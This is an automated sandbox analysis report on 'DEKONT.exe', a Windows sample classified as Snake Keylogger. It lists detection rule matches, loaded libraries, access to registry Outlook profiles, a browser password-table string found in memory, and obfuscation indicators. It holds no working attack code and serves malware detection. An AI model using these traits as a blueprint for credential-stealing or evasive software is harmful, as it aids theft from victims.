                  Source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DEKONT.exe PID: 7564, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                  Source: DEKONT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, -C.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DEKONT.exe.5056a70.7.raw.unpack, -C.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, V4uC3Iifq56IKQcfry.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, gBrw0gPbXtcXH18PyW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, gBrw0gPbXtcXH18PyW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DEKONT.exe.37ddc5c.2.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.DEKONT.exe.3439f78.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.DEKONT.exe.344a334.6.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: 0.2.DEKONT.exe.5b60000.12.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/3
                  Source: C:\Users\user\Desktop\DEKONT.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DEKONT.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeMutant created: NULL
                  Source: DEKONT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: DEKONT.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\DEKONT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: DEKONT.exe, 00000003.00000002.3822157482.0000000003228000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3824813845.0000000004060000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000326E000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003238000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.0000000003246000.00000004.00000800.00020000.00000000.sdmp, DEKONT.exe, 00000003.00000002.3822157482.000000000327A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: DEKONT.exeReversingLabs: Detection: 44%
                  Source: DEKONT.exeVirustotal: Detection: 47%
                  Source: unknownProcess created: C:\Users\user\Desktop\DEKONT.exe "C:\Users\user\Desktop\DEKONT.exe"
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess created: C:\Users\user\Desktop\DEKONT.exe "C:\Users\user\Desktop\DEKONT.exe"
                  Source: C:\Users\user\Desktop\DEKONT.exeProcess created: C:\Users\user\Desktop\DEKONT.exe "C:\Users\user\Desktop\DEKONT.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\DEKONT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: DEKONT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: DEKONT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: DEKONT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: YaaO.pdbSHA256 source: DEKONT.exe
                  Source: Binary string: YaaO.pdb source: DEKONT.exe

                  Data Obfuscation

                  barindex
                  Source: 0.2.DEKONT.exe.4409970.10.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 0.2.DEKONT.exe.5b20000.11.raw.unpack, V4uC3Iifq56IKQcfry.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: DEKONT.exe, frm_Graph_Drawer.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.cs.Net Code: V0iuXfAkuX System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, am6RHBVRAjP4cOtlwi.cs.Net Code: V0iuXfAkuX System.Reflection.Assembly.Load(byte[])
                  Source: DEKONT.exeStatic PE information: 0x8DFED4A7 [Wed Jun 28 18:40:39 2045 UTC]
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_017FDD18 push eax; iretd 0_2_017FF3A9
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_017FF3F0 pushfd ; iretd 0_2_017FF3F1
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_059A37D0 push eax; iretd 0_2_059A37D1
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_059ACF50 push eax; mov dword ptr [esp], edx0_2_059ACF64
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_059A3932 pushfd ; iretd 0_2_059A3939
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_059A38B2 pushad ; iretd 0_2_059A38B9
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABF6DE pushfd ; iretd 0_2_07ABF6DF
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABF5EE pushfd ; iretd 0_2_07ABF5EF
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABF4C7 pushfd ; iretd 0_2_07ABF4C8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABF1AA pushfd ; iretd 0_2_07ABF1AB
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABF132 pushfd ; iretd 0_2_07ABF133
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 0_2_07ABF8F7 pushfd ; iretd 0_2_07ABF8F8
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_02DC9770 push esp; ret 3_2_02DC9771
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE3671 push es; iretd 3_2_06CE367C
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEF75D push es; ret 3_2_06CEF888
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CEF889 push es; ret 3_2_06CEF888
                  Source: C:\Users\user\Desktop\DEKONT.exeCode function: 3_2_06CE9045 push es; ret 3_2_06CE904C
                  Source: DEKONT.exeStatic PE information: section name: .text entropy: 7.894619562911896
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, j7d5IZaVDa8eflLKhe.csHigh entropy of concatenated method names: 'Dispose', 'YQbSRd8CIr', 'NBkGmQUEBF', 'l2btt69X0M', 'lpGSjvFYN1', 'T41SzQibdE', 'ProcessDialogKey', 'DHAGT9kF5E', 'xMoGSWPl4N', 'J5RGG0yyrD'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, NrVOQ4zeWdeVemv54c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sqEy06EkHZ', 'i64yhNOq3b', 'CqJyZL140A', 'Ykuy83HTux', 'NF2y6ok59K', 'tv6yyGLf15', 'H9gyKWXGYY'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, muuaUoYiGSoCDdtP5k.csHigh entropy of concatenated method names: 'WiEySSoxDY', 'r3HybsKy6r', 'KMByuWM7mR', 'daQyYEVdcn', 'NPZyVdwErR', 'sikyas3i1e', 'AtUy3Dl89Q', 'xlU6J8bIC6', 'Jga6QmZZ6c', 'Vrq6RCXOQ4'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, yF000nJfGcUm3eXcd6.csHigh entropy of concatenated method names: 'LsTSg9qWCk', 'xvKSFUP70r', 'vXJSUjRcoZ', 'uEtS9TwUOF', 'gkqShoV01o', 'yiNSZ0Mj9A', 'gkEcbl9QpfuwCiLQcE', 'JCAj49fxwY6ICSYfRW', 'RYXSSaPVrK', 'NsUSbbFICD'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, YmAf6MkD2jSb9njWmK.csHigh entropy of concatenated method names: 'Esd3dvXPia', 'l8j3LRaKLp', 'Wno3XihAPf', 'Pfk3fKsF7l', 'F6u3OADrMx', 'kW23e9nTgp', 'Qqe3Mj18Q6', 'IkJ3oWxDRL', 'rDxX9h4BY6BCoD2uUom', 'NVmtcI4jAGOGIfDqbJA'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, f5NFKofKgfJb7mVTpo.csHigh entropy of concatenated method names: 'QB4hAtCDIS', 'TBUhkOP5su', 'i6WhcPjsUr', 'Tg2hnEwqNI', 'vUChmEU4y1', 'OpqhD6IYBw', 'LG7hr5EW6A', 'WFAhi6Is42', 'xd1h5NmDN6', 'c6VhNCRtrY'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, T2wON1nl2AHSS7i3Cd.csHigh entropy of concatenated method names: 'vs6aqYDlJe', 'vIEae1JnTG', 'LL2CDM179A', 'PSiCrsb9I1', 'S9jCi1Y0VS', 'QvSC5XKyyU', 'RkmCNB2iQs', 'UGjCxsH1w9', 'cLwCvmB9p1', 'CORCAJRthF'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, e2x0LcsrhHTSFP8f88.csHigh entropy of concatenated method names: 'qqu8QNTANw', 'tjS8jDCbGN', 'HLR6TNmS3T', 'PR06S39DBg', 'FhF823uPbT', 'qBE8khOYIe', 'cha8sH9DN2', 'WJq8cLXvwq', 'wsI8nI3iHl', 'SFX845yDgj'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, A0ifTxEhkahsKJcug7.csHigh entropy of concatenated method names: 'qov0ILdnPw', 'Eqd0MX1MS3', 'yLc0HR4vPr', 'B9K0mQaHsB', 'uXY0rNBQKy', 'Sw00i1gugn', 'n7t0NoQMtU', 'TDf0xJfVEt', 'TJx0A82xCL', 'tX402bl8NB'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, hgicsSiWJil1ySVfNkc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CGJKcCiosc', 'BxcKnge9VJ', 'rgjK4IDRDk', 'tH3Kp6QFnC', 'GycKWTFqhk', 'FE0KP6U07J', 'moiKJ3XABH'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, gBrw0gPbXtcXH18PyW.csHigh entropy of concatenated method names: 'PWHVcgh4Zo', 'rimVnfljhR', 'xNOV4ga8Wx', 'vv6VpOndoN', 'qqAVWKBehY', 'wE9VPhSDcJ', 'rMaVJaJb58', 'qNGVQPJT1b', 'KyBVRqIL8x', 'YZqVjrhrtb'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, Vu7uKBGDy1SRZu1Rwk.csHigh entropy of concatenated method names: 'KJS3wNu6nd', 'vHZ3V0if6Y', 'DGP3aovHcZ', 'EAC3gmZJU5', 'R6p3FIvIBa', 'w2HaW6O5LH', 'NXPaPqDd8s', 'L6EaJAIPF4', 'WJdaQBrDvJ', 'XEZaRU4F80'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, dZi2dj2hRfNN8h8ksu.csHigh entropy of concatenated method names: 'ToString', 'rDLZ2npVs2', 'fuNZmmn1P9', 'DOQZDAglPg', 'wqpZrqQ7wH', 'mhvZiaEdXb', 'HlxZ5bTTva', 'MDuZNy0fHq', 'jovZxqtMGH', 'iZ4ZvWVp7j'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, KXbphEuMQhqJVEQoHN.csHigh entropy of concatenated method names: 'fTCXV8POU', 'YOsf4DMSK', 'zKPOQTjUT', 'vUGe7Yu1f', 's8SMVdvbn', 'ECPoxvOp1', 'wJ0l7PP7mgVKm7pksU', 'LONHPEUi8265Ew4qbO', 'aSx6QGAIn', 'M9xKlMe4m'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, lGaBmFeZoKPSkJP2Yp.csHigh entropy of concatenated method names: 'vc5CfD3IXy', 'ASLCOnWPQI', 'L2yCIvLsAb', 'To3CMUXlDp', 'BLMChjwWcj', 'JVxCZHJC3O', 'ut0C81SnUE', 'x28C69df3j', 'UdyCyyAOmi', 'S4dCKHEocf'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, Ywj4IaidrNmP8uv9vDJ.csHigh entropy of concatenated method names: 'Id5yLlpHWO', 'gy4yB3XQ69', 'FSwyX5YUs8', 'FL8yfTf6iA', 'SIxyqarAE2', 'rlZyOpucCs', 'xtFyeCEA0d', 'WoQyIEeMQj', 'BoOyMx7XYH', 'j92yo63jMS'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, B4811WBL5mqt3ICmNd.csHigh entropy of concatenated method names: 'Be6gYa1Mry', 'RNhgCCPmnl', 'MT3g3r93XP', 'DFi3jou71e', 'mIk3z8TjwO', 'ujdgTSmMtM', 'KYhgSq3AZk', 'XNQgGWHuTJ', 'HS8gbK7J3w', 'G0mguGLxOI'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, rLmnNArP7PMRCd7lnZ.csHigh entropy of concatenated method names: 'Evl6Y0Whxr', 'qgR6VsEdAm', 're76CWwgB0', 'bZC6aM43Io', 'TSg63UMjKx', 'Ivm6gFNOlM', 'byg6FFB0R0', 'UcN6EaaGCV', 'V4w6UCt7Lk', 'jX169cVtTZ'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, am6RHBVRAjP4cOtlwi.csHigh entropy of concatenated method names: 'PxCbwXdJr5', 'D9IbYynKIL', 'l9GbVZSH7o', 'eCLbCFOomy', 'asDbaHLltO', 'GVQb33uaOD', 'HLlbgrTb6P', 'jK2bFQIlLq', 'kCHbEtCv2i', 'YhVbUAoxDl'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, FBG5j0iuYmUu2hs3rvO.csHigh entropy of concatenated method names: 'BVSKL8JT5Y', 'VgxKB6mUN7', 'E12KXgaD9m', 'NWbo4MZp6D7eQuKkqtp', 'u4O1ncZ40P2AaXDrFJl', 'rNIAsvZDs2OwHN49hTb', 'kYjD05ZAi6Jpt0QPqwG'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, BFLjVfUFsTVdK6vfYh.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UBPGRQcean', 'Gh7Gj844bg', 'OZ3GzDf4N5', 'ENBbTqRG9y', 'EvRbSr2yTm', 'tq1bGYGv8l', 'T5ybb6hZCk', 'wmqQ5DplEUp2txgLK2P'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, F210rv93PN13RwKJgt.csHigh entropy of concatenated method names: 'V51345goeB', 'zfv3pHKBAx', 'jlj3WjfsrN', 'ToString', 'jVt3PTFlX2', 'shK3Jh18kc', 'EBgIAr4FQW6NbudKLPc', 'WknDC34Eysm7R6M5wJZ'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, Lx9sgrycVNWcPtH7Mh.csHigh entropy of concatenated method names: 'FZQgL2dWTg', 'OZdgBlfbmG', 'iGlgXJAjYy', 'bWhgfsRR8y', 'ey2gqCsvj9', 'wfigO0Ts0Q', 'm0ogeuk6h3', 'BbTgIYsToM', 'yENgMOilNQ', 'xKagoHKFjt'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, AdfsfmCabcv5q7JqiV.csHigh entropy of concatenated method names: 'o2H8UTwoUn', 'jtJ89ykxL2', 'ToString', 'b9K8YeR9y5', 'bPX8VfyOgm', 'f228CuIvTQ', 'U3F8aQkjAE', 'A9s83iQBbF', 'MHA8gKCxxM', 'By88FKKrHU'
                  Source: 0.2.DEKONT.exe.4ff4650.9.raw.unpack, tlZ78fq5Zw1LILhJLc.csHigh entropy of concatenated method names: 'AAn6HO6HkR', 'Gjt6mhAy5U', 'qOx6DlTZMU', 'eHy6rtgrOM', 'Pba6cWLU3G', 'OJD6i0hRbv', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, j7d5IZaVDa8eflLKhe.csHigh entropy of concatenated method names: 'Dispose', 'YQbSRd8CIr', 'NBkGmQUEBF', 'l2btt69X0M', 'lpGSjvFYN1', 'T41SzQibdE', 'ProcessDialogKey', 'DHAGT9kF5E', 'xMoGSWPl4N', 'J5RGG0yyrD'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, NrVOQ4zeWdeVemv54c.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sqEy06EkHZ', 'i64yhNOq3b', 'CqJyZL140A', 'Ykuy83HTux', 'NF2y6ok59K', 'tv6yyGLf15', 'H9gyKWXGYY'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, muuaUoYiGSoCDdtP5k.csHigh entropy of concatenated method names: 'WiEySSoxDY', 'r3HybsKy6r', 'KMByuWM7mR', 'daQyYEVdcn', 'NPZyVdwErR', 'sikyas3i1e', 'AtUy3Dl89Q', 'xlU6J8bIC6', 'Jga6QmZZ6c', 'Vrq6RCXOQ4'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, yF000nJfGcUm3eXcd6.csHigh entropy of concatenated method names: 'LsTSg9qWCk', 'xvKSFUP70r', 'vXJSUjRcoZ', 'uEtS9TwUOF', 'gkqShoV01o', 'yiNSZ0Mj9A', 'gkEcbl9QpfuwCiLQcE', 'JCAj49fxwY6ICSYfRW', 'RYXSSaPVrK', 'NsUSbbFICD'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, YmAf6MkD2jSb9njWmK.csHigh entropy of concatenated method names: 'Esd3dvXPia', 'l8j3LRaKLp', 'Wno3XihAPf', 'Pfk3fKsF7l', 'F6u3OADrMx', 'kW23e9nTgp', 'Qqe3Mj18Q6', 'IkJ3oWxDRL', 'rDxX9h4BY6BCoD2uUom', 'NVmtcI4jAGOGIfDqbJA'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, f5NFKofKgfJb7mVTpo.csHigh entropy of concatenated method names: 'QB4hAtCDIS', 'TBUhkOP5su', 'i6WhcPjsUr', 'Tg2hnEwqNI', 'vUChmEU4y1', 'OpqhD6IYBw', 'LG7hr5EW6A', 'WFAhi6Is42', 'xd1h5NmDN6', 'c6VhNCRtrY'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, T2wON1nl2AHSS7i3Cd.csHigh entropy of concatenated method names: 'vs6aqYDlJe', 'vIEae1JnTG', 'LL2CDM179A', 'PSiCrsb9I1', 'S9jCi1Y0VS', 'QvSC5XKyyU', 'RkmCNB2iQs', 'UGjCxsH1w9', 'cLwCvmB9p1', 'CORCAJRthF'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, e2x0LcsrhHTSFP8f88.csHigh entropy of concatenated method names: 'qqu8QNTANw', 'tjS8jDCbGN', 'HLR6TNmS3T', 'PR06S39DBg', 'FhF823uPbT', 'qBE8khOYIe', 'cha8sH9DN2', 'WJq8cLXvwq', 'wsI8nI3iHl', 'SFX845yDgj'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, A0ifTxEhkahsKJcug7.csHigh entropy of concatenated method names: 'qov0ILdnPw', 'Eqd0MX1MS3', 'yLc0HR4vPr', 'B9K0mQaHsB', 'uXY0rNBQKy', 'Sw00i1gugn', 'n7t0NoQMtU', 'TDf0xJfVEt', 'TJx0A82xCL', 'tX402bl8NB'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, hgicsSiWJil1ySVfNkc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CGJKcCiosc', 'BxcKnge9VJ', 'rgjK4IDRDk', 'tH3Kp6QFnC', 'GycKWTFqhk', 'FE0KP6U07J', 'moiKJ3XABH'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, gBrw0gPbXtcXH18PyW.csHigh entropy of concatenated method names: 'PWHVcgh4Zo', 'rimVnfljhR', 'xNOV4ga8Wx', 'vv6VpOndoN', 'qqAVWKBehY', 'wE9VPhSDcJ', 'rMaVJaJb58', 'qNGVQPJT1b', 'KyBVRqIL8x', 'YZqVjrhrtb'
                  Source: 0.2.DEKONT.exe.3210000.0.raw.unpack, Vu7uKBGDy1SRZu1Rwk.csHigh entropy of concatenated method names: 'KJS3wNu6nd', 'vHZ3V0if6Y', 'DGP3aovHcZ', 'EAC3gmZJU5', 'R6p3FIvIBa', 'w2HaW6O5LH', 'NXPaPqDd8s', 'L6EaJAIPF4', 'WJdaQBrDvJ', 'XEZaRU4F80'
